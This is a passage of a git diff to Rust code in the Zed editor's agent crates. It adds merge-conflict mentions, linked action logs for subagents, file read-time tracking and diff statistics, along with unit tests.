MentionUri { @@ -134,12 +135,6 @@ impl MentionUri { id: acp::SessionId::new(thread_id), name, }) - } else if let Some(path) = path.strip_prefix("/agent/text-thread/") { - let name = single_query_param(&url, "name")?.context("Missing thread name")?; - Ok(Self::TextThread { - path: path.into(), - name, - }) } else if let Some(rule_id) = path.strip_prefix("/agent/rule/") { let name = single_query_param(&url, "name")?.context("Missing rule name")?; let rule_id = UserPromptId(rule_id.parse()?); @@ -162,7 +157,9 @@ impl MentionUri { include_warnings, }) } else if path.starts_with("/agent/pasted-image") { - 
Ok(Self::PastedImage) + let name = + single_query_param(&url, "name")?.unwrap_or_else(|| "Image".to_string()); + Ok(Self::PastedImage { name }) } else if path.starts_with("/agent/untitled-buffer") { let fragment = url .fragment() @@ -215,6 +212,9 @@ impl MentionUri { let base_ref = single_query_param(&url, "base")?.unwrap_or_else(|| "main".to_string()); Ok(Self::GitDiff { base_ref }) + } else if path.starts_with("/agent/merge-conflict") { + let file_path = single_query_param(&url, "path")?.unwrap_or_default(); + Ok(Self::MergeConflict { file_path }) } else { bail!("invalid zed url: {:?}", input); } @@ -231,10 +231,9 @@ impl MentionUri { .unwrap_or_default() .to_string_lossy() .into_owned(), - MentionUri::PastedImage => "Image".to_string(), + MentionUri::PastedImage { name } => name.clone(), MentionUri::Symbol { name, .. } => name.clone(), MentionUri::Thread { name, .. } => name.clone(), - MentionUri::TextThread { name, .. } => name.clone(), MentionUri::Rule { name, .. } => name.clone(), MentionUri::Diagnostics { .. } => "Diagnostics".to_string(), MentionUri::TerminalSelection { line_count } => { @@ -245,6 +244,13 @@ impl MentionUri { } } MentionUri::GitDiff { base_ref } => format!("Branch Diff ({})", base_ref), + MentionUri::MergeConflict { file_path } => { + let name = Path::new(file_path) + .file_name() + .unwrap_or_default() + .to_string_lossy(); + format!("Merge Conflict ({name})") + } MentionUri::Selection { abs_path: path, line_range, @@ -254,23 +260,58 @@ impl MentionUri { } } + pub fn tooltip_text(&self) -> Option { + match self { + MentionUri::File { abs_path } | MentionUri::Directory { abs_path } => { + Some(abs_path.to_string_lossy().into_owned().into()) + } + MentionUri::Symbol { + abs_path, + line_range, + .. + } => Some( + format!( + "{}:{}-{}", + abs_path.display(), + line_range.start(), + line_range.end() + ) + .into(), + ), + MentionUri::Selection { + abs_path: Some(path), + line_range, + .. 
+ } => Some( + format!( + "{}:{}-{}", + path.display(), + line_range.start(), + line_range.end() + ) + .into(), + ), + _ => None, + } + } + pub fn icon_path(&self, cx: &mut App) -> SharedString { match self { MentionUri::File { abs_path } => { FileIcons::get_icon(abs_path, cx).unwrap_or_else(|| IconName::File.path().into()) } - MentionUri::PastedImage => IconName::Image.path().into(), + MentionUri::PastedImage { .. } => IconName::Image.path().into(), MentionUri::Directory { abs_path } => FileIcons::get_folder_icon(false, abs_path, cx) .unwrap_or_else(|| IconName::Folder.path().into()), MentionUri::Symbol { .. } => IconName::Code.path().into(), MentionUri::Thread { .. } => IconName::Thread.path().into(), - MentionUri::TextThread { .. } => IconName::Thread.path().into(), MentionUri::Rule { .. } => IconName::Reader.path().into(), MentionUri::Diagnostics { .. } => IconName::Warning.path().into(), MentionUri::TerminalSelection { .. } => IconName::Terminal.path().into(), MentionUri::Selection { .. } => IconName::Reader.path().into(), MentionUri::Fetch { .. } => IconName::ToolWeb.path().into(), MentionUri::GitDiff { .. } => IconName::GitBranch.path().into(), + MentionUri::MergeConflict { .. 
} => IconName::GitMergeConflict.path().into(), } } @@ -285,10 +326,18 @@ impl MentionUri { url.set_path(&abs_path.to_string_lossy()); url } - MentionUri::PastedImage => Url::parse("zed:///agent/pasted-image").unwrap(), + MentionUri::PastedImage { name } => { + let mut url = Url::parse("zed:///agent/pasted-image").unwrap(); + url.query_pairs_mut().append_pair("name", name); + url + } MentionUri::Directory { abs_path } => { let mut url = Url::parse("file:///").unwrap(); - url.set_path(&abs_path.to_string_lossy()); + let mut path = abs_path.to_string_lossy().into_owned(); + if !path.ends_with('/') && !path.ends_with('\\') { + path.push('/'); + } + url.set_path(&path); url } MentionUri::Symbol { @@ -332,15 +381,6 @@ impl MentionUri { url.query_pairs_mut().append_pair("name", name); url } - MentionUri::TextThread { path, name } => { - let mut url = Url::parse("zed:///").unwrap(); - url.set_path(&format!( - "/agent/text-thread/{}", - path.to_string_lossy().trim_start_matches('/') - )); - url.query_pairs_mut().append_pair("name", name); - url - } MentionUri::Rule { name, id } => { let mut url = Url::parse("zed:///").unwrap(); url.set_path(&format!("/agent/rule/{id}")); @@ -374,6 +414,11 @@ impl MentionUri { url.query_pairs_mut().append_pair("base", base_ref); url } + MentionUri::MergeConflict { file_path } => { + let mut url = Url::parse("zed:///agent/merge-conflict").unwrap(); + url.query_pairs_mut().append_pair("path", file_path); + url + } } } } @@ -457,6 +502,21 @@ mod tests { assert_eq!(uri.to_uri().to_string(), expected); } + #[test] + fn test_directory_uri_round_trip_without_trailing_slash() { + let uri = MentionUri::Directory { + abs_path: PathBuf::from(path!("/path/to/dir")), + }; + let serialized = uri.to_uri().to_string(); + assert!(serialized.ends_with('/'), "directory URI must end with /"); + let parsed = MentionUri::parse(&serialized, PathStyle::local()).unwrap(); + assert!( + matches!(parsed, MentionUri::Directory { .. 
}), + "expected Directory variant, got {:?}", + parsed + ); + } + #[test] fn test_parse_symbol_uri() { let symbol_uri = uri!("file:///path/to/file.rs?symbol=MySymbol#L10:20"); diff --git a/crates/acp_tools/Cargo.toml b/crates/acp_tools/Cargo.toml index 0720c4b6685ecf7fa20d8cacd2b61baa765c961c..8f14b1f93b32c6df521ea13ebf3f0f73e7ed755c 100644 --- a/crates/acp_tools/Cargo.toml +++ b/crates/acp_tools/Cargo.toml @@ -23,7 +23,7 @@ project.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/acp_tools/src/acp_tools.rs b/crates/acp_tools/src/acp_tools.rs index b5b0e078ae0e41f5c3527265009fac803757ff1a..ae8a39c8df4f73ae8be6b748694dbde5d2a0c102 100644 --- a/crates/acp_tools/src/acp_tools.rs +++ b/crates/acp_tools/src/acp_tools.rs @@ -13,10 +13,10 @@ use gpui::{ StyleRefinement, Subscription, Task, TextStyleRefinement, Window, actions, list, prelude::*, }; use language::LanguageRegistry; -use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle}; -use project::Project; +use markdown::{CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; +use project::{AgentId, Project}; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*}; use util::ResultExt as _; use workspace::{ @@ -48,7 +48,7 @@ pub struct AcpConnectionRegistry { } struct ActiveConnection { - server_name: SharedString, + agent_id: AgentId, connection: Weak, } @@ -65,12 +65,12 @@ impl AcpConnectionRegistry { pub fn set_active_connection( &self, - server_name: impl Into, + agent_id: AgentId, connection: &Rc, cx: &mut Context, ) { self.active_connection.replace(Some(ActiveConnection { - server_name: server_name.into(), + agent_id, connection: Rc::downgrade(connection), })); cx.notify(); @@ -87,7 +87,7 @@ 
struct AcpTools { } struct WatchedConnection { - server_name: SharedString, + agent_id: AgentId, messages: Vec, list_state: ListState, connection: Weak, @@ -144,7 +144,7 @@ impl AcpTools { }); self.watched_connection = Some(WatchedConnection { - server_name: active_connection.server_name.clone(), + agent_id: active_connection.agent_id.clone(), messages: vec![], list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), connection: active_connection.connection.clone(), @@ -291,7 +291,6 @@ impl AcpTools { v_flex() .id(index) .group("message") - .cursor_pointer() .font_buffer(cx) .w_full() .py_3() @@ -303,27 +302,29 @@ impl AcpTools { .border_color(colors.border) .border_b_1() .hover(|this| this.bg(colors.element_background.opacity(0.5))) - .on_click(cx.listener(move |this, _, _, cx| { - if this.expanded.contains(&index) { - this.expanded.remove(&index); - } else { - this.expanded.insert(index); - let Some(connection) = &mut this.watched_connection else { - return; - }; - let Some(message) = connection.messages.get_mut(index) else { - return; - }; - message.expanded(this.project.read(cx).languages().clone(), cx); - connection.list_state.scroll_to_reveal_item(index); - } - cx.notify() - })) .child( h_flex() + .id(("acp-log-message-header", index)) .w_full() .gap_2() .flex_shrink_0() + .cursor_pointer() + .on_click(cx.listener(move |this, _, _, cx| { + if this.expanded.contains(&index) { + this.expanded.remove(&index); + } else { + this.expanded.insert(index); + let Some(connection) = &mut this.watched_connection else { + return; + }; + let Some(message) = connection.messages.get_mut(index) else { + return; + }; + message.expanded(this.project.read(cx).languages().clone(), cx); + connection.list_state.scroll_to_reveal_item(index); + } + cx.notify() + })) .child(match message.direction { acp::StreamMessageDirection::Incoming => Icon::new(IconName::ArrowDown) .color(Color::Error) @@ -383,8 +384,11 @@ impl AcpTools { ) .code_block_renderer( CodeBlockRenderer::Default 
{ - copy_button: false, - copy_button_on_hover: expanded, + copy_button_visibility: if expanded { + CopyButtonVisibility::VisibleOnHover + } else { + CopyButtonVisibility::Hidden + }, border: false, }, ), @@ -483,7 +487,7 @@ impl Item for AcpTools { "ACP: {}", self.watched_connection .as_ref() - .map_or("Disconnected", |connection| &connection.server_name) + .map_or("Disconnected", |connection| connection.agent_id.0.as_ref()) ) .into() } diff --git a/crates/action_log/Cargo.toml b/crates/action_log/Cargo.toml index 8488df691e40ea3bcfc04f4f6f74964fba7863dd..5227a61651012279e83a3b6e3e68b1484acb0f66 100644 --- a/crates/action_log/Cargo.toml +++ b/crates/action_log/Cargo.toml @@ -20,6 +20,7 @@ buffer_diff.workspace = true log.workspace = true clock.workspace = true collections.workspace = true +fs.workspace = true futures.workspace = true gpui.workspace = true language.workspace = true @@ -36,7 +37,7 @@ collections = { workspace = true, features = ["test-support"] } clock = { workspace = true, features = ["test-support"] } ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } -indoc.workspace = true + language = { workspace = true, features = ["test-support"] } log.workspace = true pretty_assertions.workspace = true diff --git a/crates/action_log/src/action_log.rs b/crates/action_log/src/action_log.rs index 1157d8d6f881ecb33df8104dd4be04bd9d846b5e..1f17d38f7d2a2770350026f2f145a53723ef7481 100644 --- a/crates/action_log/src/action_log.rs +++ b/crates/action_log/src/action_log.rs @@ -1,14 +1,20 @@ use anyhow::{Context as _, Result}; use buffer_diff::BufferDiff; use clock; -use collections::BTreeMap; +use collections::{BTreeMap, HashMap}; +use fs::MTime; use futures::{FutureExt, StreamExt, channel::mpsc}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity, }; use language::{Anchor, Buffer, BufferEvent, Point, ToOffset, ToPoint}; use project::{Project, ProjectItem, lsp_store::OpenLspBufferHandle}; 
-use std::{cmp, ops::Range, sync::Arc}; +use std::{ + cmp, + ops::Range, + path::{Path, PathBuf}, + sync::Arc, +}; use text::{Edit, Patch, Rope}; use util::{RangeExt, ResultExt as _}; @@ -48,8 +54,14 @@ pub struct ActionLog { tracked_buffers: BTreeMap, TrackedBuffer>, /// The project this action log is associated with project: Entity, + /// An action log to forward all public methods to + /// Useful in cases like subagents, where we want to track individual diffs for this subagent, + /// but also want to associate the reads/writes with a parent review experience + linked_action_log: Option>, /// Stores undo information for the most recent reject operation last_reject_undo: Option, + /// Tracks the last time files were read by the agent, to detect external modifications + file_read_times: HashMap, } impl ActionLog { @@ -58,14 +70,47 @@ impl ActionLog { Self { tracked_buffers: BTreeMap::default(), project, + linked_action_log: None, last_reject_undo: None, + file_read_times: HashMap::default(), } } + pub fn with_linked_action_log(mut self, linked_action_log: Entity) -> Self { + self.linked_action_log = Some(linked_action_log); + self + } + pub fn project(&self) -> &Entity { &self.project } + pub fn file_read_time(&self, path: &Path) -> Option { + self.file_read_times.get(path).copied() + } + + fn update_file_read_time(&mut self, buffer: &Entity, cx: &App) { + let buffer = buffer.read(cx); + if let Some(file) = buffer.file() { + if let Some(local_file) = file.as_local() { + if let Some(mtime) = file.disk_state().mtime() { + let abs_path = local_file.abs_path(cx); + self.file_read_times.insert(abs_path, mtime); + } + } + } + } + + fn remove_file_read_time(&mut self, buffer: &Entity, cx: &App) { + let buffer = buffer.read(cx); + if let Some(file) = buffer.file() { + if let Some(local_file) = file.as_local() { + let abs_path = local_file.abs_path(cx); + self.file_read_times.remove(&abs_path); + } + } + } + fn track_buffer_internal( &mut self, buffer: Entity, @@ -164,7 
+209,7 @@ impl ActionLog { cx: &mut Context, ) { match event { - BufferEvent::Edited => { + BufferEvent::Edited { .. } => { let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { return; }; @@ -496,16 +541,70 @@ impl ActionLog { /// Track a buffer as read by agent, so we can notify the model about user edits. pub fn buffer_read(&mut self, buffer: Entity, cx: &mut Context) { + self.buffer_read_impl(buffer, true, cx); + } + + fn buffer_read_impl( + &mut self, + buffer: Entity, + record_file_read_time: bool, + cx: &mut Context, + ) { + if let Some(linked_action_log) = &self.linked_action_log { + // We don't want to share read times since the other agent hasn't read it necessarily + linked_action_log.update(cx, |log, cx| { + log.buffer_read_impl(buffer.clone(), false, cx); + }); + } + if record_file_read_time { + self.update_file_read_time(&buffer, cx); + } self.track_buffer_internal(buffer, false, cx); } /// Mark a buffer as created by agent, so we can refresh it in the context pub fn buffer_created(&mut self, buffer: Entity, cx: &mut Context) { + self.buffer_created_impl(buffer, true, cx); + } + + fn buffer_created_impl( + &mut self, + buffer: Entity, + record_file_read_time: bool, + cx: &mut Context, + ) { + if let Some(linked_action_log) = &self.linked_action_log { + // We don't want to share read times since the other agent hasn't read it necessarily + linked_action_log.update(cx, |log, cx| { + log.buffer_created_impl(buffer.clone(), false, cx); + }); + } + if record_file_read_time { + self.update_file_read_time(&buffer, cx); + } self.track_buffer_internal(buffer, true, cx); } /// Mark a buffer as edited by agent, so we can refresh it in the context pub fn buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { + self.buffer_edited_impl(buffer, true, cx); + } + + fn buffer_edited_impl( + &mut self, + buffer: Entity, + record_file_read_time: bool, + cx: &mut Context, + ) { + if let Some(linked_action_log) = &self.linked_action_log { + // We 
don't want to share read times since the other agent hasn't read it necessarily + linked_action_log.update(cx, |log, cx| { + log.buffer_edited_impl(buffer.clone(), false, cx); + }); + } + if record_file_read_time { + self.update_file_read_time(&buffer, cx); + } let new_version = buffer.read(cx).version(); let tracked_buffer = self.track_buffer_internal(buffer, false, cx); if let TrackedBufferStatus::Deleted = tracked_buffer.status { @@ -517,6 +616,9 @@ impl ActionLog { } pub fn will_delete_buffer(&mut self, buffer: Entity, cx: &mut Context) { + // Ok to propagate file read time removal to linked action log + self.remove_file_read_time(&buffer, cx); + let has_linked_action_log = self.linked_action_log.is_some(); let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); match tracked_buffer.status { TrackedBufferStatus::Created { .. } => { @@ -524,12 +626,24 @@ impl ActionLog { cx.notify(); } TrackedBufferStatus::Modified => { - buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); tracked_buffer.status = TrackedBufferStatus::Deleted; - tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + if !has_linked_action_log { + buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } } + TrackedBufferStatus::Deleted => {} } + + if let Some(linked_action_log) = &mut self.linked_action_log { + linked_action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + } + + if has_linked_action_log && let Some(tracked_buffer) = self.tracked_buffers.get(&buffer) { + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } + cx.notify(); } @@ -624,6 +738,7 @@ impl ActionLog { let task = if let Some(existing_file_content) = existing_file_content { // Capture the agent's content before restoring existing file content let agent_content = buffer.read(cx).text(); + let buffer_id = buffer.read(cx).remote_id(); buffer.update(cx, |buffer, cx| { buffer.start_transaction(); 
@@ -636,7 +751,10 @@ impl ActionLog { undo_info = Some(PerBufferUndo { buffer: buffer.downgrade(), - edits_to_restore: vec![(Anchor::MIN..Anchor::MAX, agent_content)], + edits_to_restore: vec![( + Anchor::min_for_buffer(buffer_id)..Anchor::max_for_buffer(buffer_id), + agent_content, + )], status: UndoBufferStatus::Created { had_existing_content: true, }, @@ -876,8 +994,8 @@ impl ActionLog { let mut valid_edits = Vec::new(); for (anchor_range, text_to_restore) in per_buffer_undo.edits_to_restore { - if anchor_range.start.buffer_id == Some(buffer.remote_id()) - && anchor_range.end.buffer_id == Some(buffer.remote_id()) + if anchor_range.start.buffer_id == buffer.remote_id() + && anchor_range.end.buffer_id == buffer.remote_id() { valid_edits.push((anchor_range, text_to_restore)); } @@ -914,13 +1032,9 @@ impl ActionLog { .collect() } - /// Returns all tracked buffers for debugging purposes - #[cfg(any(test, feature = "test-support"))] - pub fn tracked_buffers_for_debug( - &self, - _cx: &App, - ) -> impl Iterator, &TrackedBuffer)> { - self.tracked_buffers.iter() + /// Returns the total number of lines added and removed across all unreviewed buffers. 
+ pub fn diff_stats(&self, cx: &App) -> DiffStats { + DiffStats::all_files(&self.changed_buffers(cx), cx) } /// Iterate over buffers changed since last read or edited by the model @@ -939,6 +1053,46 @@ impl ActionLog { } } +#[derive(Default, Debug, Clone, Copy)] +pub struct DiffStats { + pub lines_added: u32, + pub lines_removed: u32, +} + +impl DiffStats { + pub fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self { + let mut stats = DiffStats::default(); + let diff_snapshot = diff.snapshot(cx); + let buffer_snapshot = buffer.snapshot(); + let base_text = diff_snapshot.base_text(); + + for hunk in diff_snapshot.hunks(&buffer_snapshot) { + let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); + stats.lines_added += added_rows; + + let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row; + let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row; + let removed_rows = base_end.saturating_sub(base_start); + stats.lines_removed += removed_rows; + } + + stats + } + + pub fn all_files( + changed_buffers: &BTreeMap, Entity>, + cx: &App, + ) -> Self { + let mut total = DiffStats::default(); + for (buffer, diff) in changed_buffers { + let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx); + total.lines_added += stats.lines_added; + total.lines_removed += stats.lines_removed; + } + total + } +} + #[derive(Clone)] pub struct ActionLogTelemetry { pub agent_telemetry_id: SharedString, @@ -2634,6 +2788,515 @@ mod tests { assert!(!action_log.read_with(cx, |log, _| log.has_pending_undo())); } + #[gpui::test] + async fn test_linked_action_log_buffer_read(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| 
ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + + // Neither log considers the buffer stale immediately after reading it. + let child_stale = cx.read(|cx| { + child_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + let parent_stale = cx.read(|cx| { + parent_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + assert!(child_stale.is_empty()); + assert!(parent_stale.is_empty()); + + // Simulate a user edit after the agent read the file. + cx.update(|cx| { + buffer.update(cx, |buffer, cx| { + buffer.edit([(0..5, "goodbye")], None, cx).unwrap(); + }); + }); + cx.run_until_parked(); + + // Both child and parent should see the buffer as stale because both tracked + // it at the pre-edit version via buffer_read forwarding. 
+ let child_stale = cx.read(|cx| { + child_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + let parent_stale = cx.read(|cx| { + parent_log + .read(cx) + .stale_buffers(cx) + .cloned() + .collect::>() + }); + assert_eq!(child_stale, vec![buffer.clone()]); + assert_eq!(parent_stale, vec![buffer]); + } + + #[gpui::test] + async fn test_linked_action_log_buffer_edited(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 0)..Point::new(1, 3), "DEF")], None, cx) + .unwrap(); + }); + child_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + + let expected_hunks = vec![( + buffer, + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(2, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }], + )]; + assert_eq!( + unreviewed_hunks(&child_log, cx), + expected_hunks, + "child should track the agent edit" + ); + assert_eq!( + unreviewed_hunks(&parent_log, cx), + expected_hunks, + "parent should also track the agent edit via linked log forwarding" + ); + } + + #[gpui::test] + async fn test_linked_action_log_buffer_created(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), 
json!({})).await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/new_file", cx) + }) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| buffer.set_text("hello", cx)); + child_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .unwrap(); + cx.run_until_parked(); + + let expected_hunks = vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 5), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )]; + assert_eq!( + unreviewed_hunks(&child_log, cx), + expected_hunks, + "child should track the created file" + ); + assert_eq!( + unreviewed_hunks(&parent_log, cx), + expected_hunks, + "parent should also track the created file via linked log forwarding" + ); + } + + #[gpui::test] + async fn test_linked_action_log_will_delete_buffer(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello\n"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| 
project.open_buffer(file_path.clone(), cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.delete_file(file_path, false, cx)) + .unwrap() + .await + .unwrap(); + cx.run_until_parked(); + + let expected_hunks = vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "hello\n".into(), + }], + )]; + assert_eq!( + unreviewed_hunks(&child_log, cx), + expected_hunks, + "child should track the deleted file" + ); + assert_eq!( + unreviewed_hunks(&parent_log, cx), + expected_hunks, + "parent should also track the deleted file via linked log forwarding" + ); + } + + /// Simulates the subagent scenario: two child logs linked to the same parent, each + /// editing a different file. The parent accumulates all edits while each child + /// only sees its own. + #[gpui::test] + async fn test_linked_action_log_independent_tracking(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "file_a": "content of a", + "file_b": "content of b", + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log_1 = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + let child_log_2 = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_a_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/file_a", cx) + }) + .unwrap(); + let file_b_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/file_b", cx) + }) + .unwrap(); + let buffer_a = project + .update(cx, |project, cx| project.open_buffer(file_a_path, cx)) + .await + .unwrap(); + let buffer_b = project 
+ .update(cx, |project, cx| project.open_buffer(file_b_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + child_log_1.update(cx, |log, cx| log.buffer_read(buffer_a.clone(), cx)); + buffer_a.update(cx, |buffer, cx| { + buffer.edit([(0..0, "MODIFIED: ")], None, cx).unwrap(); + }); + child_log_1.update(cx, |log, cx| log.buffer_edited(buffer_a.clone(), cx)); + + child_log_2.update(cx, |log, cx| log.buffer_read(buffer_b.clone(), cx)); + buffer_b.update(cx, |buffer, cx| { + buffer.edit([(0..0, "MODIFIED: ")], None, cx).unwrap(); + }); + child_log_2.update(cx, |log, cx| log.buffer_edited(buffer_b.clone(), cx)); + }); + cx.run_until_parked(); + + let child_1_changed: Vec<_> = cx.read(|cx| { + child_log_1 + .read(cx) + .changed_buffers(cx) + .into_keys() + .collect() + }); + let child_2_changed: Vec<_> = cx.read(|cx| { + child_log_2 + .read(cx) + .changed_buffers(cx) + .into_keys() + .collect() + }); + let parent_changed: Vec<_> = cx.read(|cx| { + parent_log + .read(cx) + .changed_buffers(cx) + .into_keys() + .collect() + }); + + assert_eq!( + child_1_changed, + vec![buffer_a.clone()], + "child 1 should only track file_a" + ); + assert_eq!( + child_2_changed, + vec![buffer_b.clone()], + "child 2 should only track file_b" + ); + assert_eq!(parent_changed.len(), 2, "parent should track both files"); + assert!( + parent_changed.contains(&buffer_a) && parent_changed.contains(&buffer_b), + "parent should contain both buffer_a and buffer_b" + ); + } + + #[gpui::test] + async fn test_file_read_time_recorded_on_buffer_read(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, 
|project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be None before buffer_read" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should be recorded after buffer_read" + ); + } + + #[gpui::test] + async fn test_file_read_time_recorded_on_buffer_edited(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be None before buffer_edited" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should be recorded after buffer_edited" + ); + } + + #[gpui::test] + async fn test_file_read_time_recorded_on_buffer_created(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "existing content"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = 
